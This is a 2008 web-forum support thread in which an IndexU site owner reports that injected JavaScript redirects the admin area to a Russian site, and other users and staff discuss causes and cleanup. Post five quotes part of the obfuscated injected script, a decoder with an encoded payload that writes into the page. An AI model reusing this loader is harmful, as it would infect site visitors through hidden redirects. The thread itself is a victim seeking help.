#1 (permalink)  
Old 04-29-2008, 05:49 AM
Registered User
 
Join Date: Mar 2007
Posts: 75
Voyageur is on a distinguished road
Default Virus !!!

Hello,

I have virus or spyware in my IndexU website, when i access admin area the browser refresh to a russian url !!!!!

Anyone has this problem ?
  #2 (permalink)  
Old 04-29-2008, 05:55 AM
Registered User
 
Join Date: Jan 2008
Posts: 106
Warz is on a distinguished road
Default

It's probably someone who managed to insert a virus code... Could be server security issues also... Try to find the code and remove it.
  #3 (permalink)  
Old 04-29-2008, 10:01 AM
Registered User
 
Join Date: Aug 2007
Posts: 85
richrf is on a distinguished road
Default

Is this the result of an SQL injection security leak? What version are you using? Thanks.

Rich
__________________
Links.com - Online TV Links, Video, Game Links.com
  #4 (permalink)  
Old 04-29-2008, 12:19 PM
Bruceper's Avatar
Nicecoder Team
 
Join Date: Jun 2002
Location: Winnipeg Canada
Posts: 4,018
Bruceper is on a distinguished road
Default

Send me your ftp login and password as well as your indexu login and password.

I would also ask for your cpanel login and password so I can check logs and see how/what was done.

I'll also want your IP address for when i'm checking the logs.

You can send it to me via PM or to support [at] nicecoder.com

For now just leave the site alone, every action you take causes the logs to fill up and may push off the info we want to look at.
  #5 (permalink)  
Old 04-29-2008, 02:06 PM
Registered User
 
Join Date: Mar 2007
Posts: 75
Voyageur is on a distinguished road
Default

hi Bruceper,

I find this code in the footer and header :

<script language=JavaScript>function ehban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,59, 51,6,33,44,30,4,28,16,0,0,0,0,0,0,42,57,21,2,36,54 ,56,25,3,8,55,52,18,17,46,53,34,61,37,40,47,20,58, 38,26,29,49,0,0,0,0,22,0,13,27,60,24,35,39,45,7,5, 0,32,10,48,19,15,50,1,9,23,31,12,11,43,14,62,41);f or(j=Math.ceil(l/b);j>0;j----REMOVED----EFOxNIDapGK6suDtNIWUpGEsPrR8L8po2z2re8ElNSW7TYDaEd PHbgO6PGe8E5WBCzWL@FOspGe_JSO31gKKPGeM6QP_pFRY3agd EdDsTIWsEzRU3aKnTu2vf8p9vgJr0ufxfup6vgJbfge9EGeMLc pv28EMprD63Ge7eupvfgPaCdR8LcEYCzPr_rWjxcR_6rfbt8Z_ HAfvPrR865J9H')</script>

I remove it from footer template but i find another in the admin template footer, my admin panel refresh to http://www.REMOVED

Maybe this come from my computer when i edit files ? cause i have some spywares but i have Outpost, it stop them.

you still need informatins for access my website ? i don't have C-Panel, only PHP Myadmin.

Thanks for help

Last edited by Bruceper; 04-29-2008 at 02:08 PM.
  #6 (permalink)  
Old 04-29-2008, 02:12 PM
Bruceper's Avatar
Nicecoder Team
 
Join Date: Jun 2002
Location: Winnipeg Canada
Posts: 4,018
Bruceper is on a distinguished road
Default

I removed some info from your post, no real need to have it public.

Looks like you've definately been hacked, but the question is how. It appears to be typical "wannabe hacker loser" javascript injection.

Yes a trojan could have sniffed your password from your home computer easily.

phpmyadmin access won't help, I want to see logs that will show where/when/how the user logged in. That can only be done typically via a control panel or from root.

Do you have an access_log file? or any other log file for apache or your ftp daemon?
  #7 (permalink)  
Old 04-29-2008, 04:57 PM
Registered User
 
Join Date: Dec 2007
Posts: 70
dePaulus is on a distinguished road
Default

replace the document.write() call with an alert() and run it in your address bar to have the deciphered output alerted for you .
  #8 (permalink)  
Old 04-29-2008, 11:02 PM
dody's Avatar
Nicecoder Team
 
Join Date: Aug 2001
Location: Indonesia
Posts: 3,292
dody is a name known to alldody is a name known to alldody is a name known to alldody is a name known to alldody is a name known to alldody is a name known to all
Default

I think it was because the hacker is trying to insert js code when filling the form.

Indexu has ability to check this kind of hacking and will remove the js code. But it seem the js code may unusual and indexu failed to remove it completely. But since your data is safe, i think the hacker is failed, but still cause a damage to your website.

Now the problem is to find where the js code and after this, we need to remove it. A quick look will be 'view source'.
  #9 (permalink)  
Old 04-29-2008, 11:12 PM
Bruceper's Avatar
Nicecoder Team
 
Join Date: Jun 2002
Location: Winnipeg Canada
Posts: 4,018
Bruceper is on a distinguished road
Default

The poster still has not provided logs or a login or even a URL to confirm any of this.
  #10 (permalink)  
Old 05-18-2008, 04:04 PM
Registered User
 
Join Date: Mar 2007
Posts: 75
Voyageur is on a distinguished road
Default

Hi,

I'm coming back !

In fact it's not a problem from IndexU, i have virus on all my websites, always in the template files, google has put a warning in the search results "this site can harm your computer".

I removed the hack code from my templates files, all seems working well now.

I noticed what Dodi said in a post here, when i'm on IndexU control panel i see often someone trying to add a site with an amazing url like "http://www.example.ru/?image.gif", an invalid url and always russian url, the hacked pages refresh a russin url too.

I think the virus come from my computer. Not a problem of IndexU !!
  #11 (permalink)  
Old 05-20-2008, 05:07 AM
Registered User
 
Join Date: Mar 2007
Posts: 75
Voyageur is on a distinguished road
Default

Hi,

The virus are coming back on all my websites !!

Anyone know a good web antivirus ? i think the virus are at my host.

Thanks
  #12 (permalink)  
Old 05-20-2008, 12:41 PM
Bruceper's Avatar
Nicecoder Team
 
Join Date: Jun 2002
Location: Winnipeg Canada
Posts: 4,018
Bruceper is on a distinguished road
Default

There isn't one. If they are coming back it's because someone is placing them there.
  #13 (permalink)  
Old 05-21-2008, 04:29 AM
dody's Avatar
Nicecoder Team
 
Join Date: Aug 2001
Location: Indonesia
Posts: 3,292
dody is a name known to alldody is a name known to alldody is a name known to alldody is a name known to alldody is a name known to alldody is a name known to all
Default

You can check the ip, are they from your ip? If no, someone else doing this, not from your pc.
  #14 (permalink)  
Old 05-22-2008, 07:28 AM
Registered User
 
Join Date: Mar 2007
Posts: 75
Voyageur is on a distinguished road
Default

I think there's a trojan at my web hosting account.

Files at my computer are clean, when i see problems with my web site i go to my ftp account and find javascript code in my templates files (an all my web sites), i replace templates files and it's ok, after some hours the javascript code come back in my templates files, that's why i believe that's the virus is not in my computer but in my hosting account.

I have an idea : lock templates files (no write permissions), maybe it resolves the problem.

It's must be something i have downloaded i think !!!
  #15 (permalink)  
Old 05-22-2008, 10:27 AM
Bruceper's Avatar
Nicecoder Team
 
Join Date: Jun 2002
Location: Winnipeg Canada
Posts: 4,018
Bruceper is on a distinguished road
Default

It's going to be a script running as root that is injecting code. Talk to your host about this.
 

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On

Similar Threads
Thread Thread Starter Forum Replies Last Post
Exploit-IFrame (Virus) ? griller111 v5.x 1 02-20-2008 09:26 AM
do not download inexu31.zip ::: virus infected !!!! egi v5.x 6 04-22-2003 04:51 AM

HACKER SAFE certified sites prevent over 99.9% of hacker crime.

All times are GMT -5. The time now is 12:16 PM.


Powered by vBulletin®
Copyright ©2000 - 2009, Jelsoft Enterprises Ltd.
Search Engine Friendly URLs by vBSEO
SSL Certificate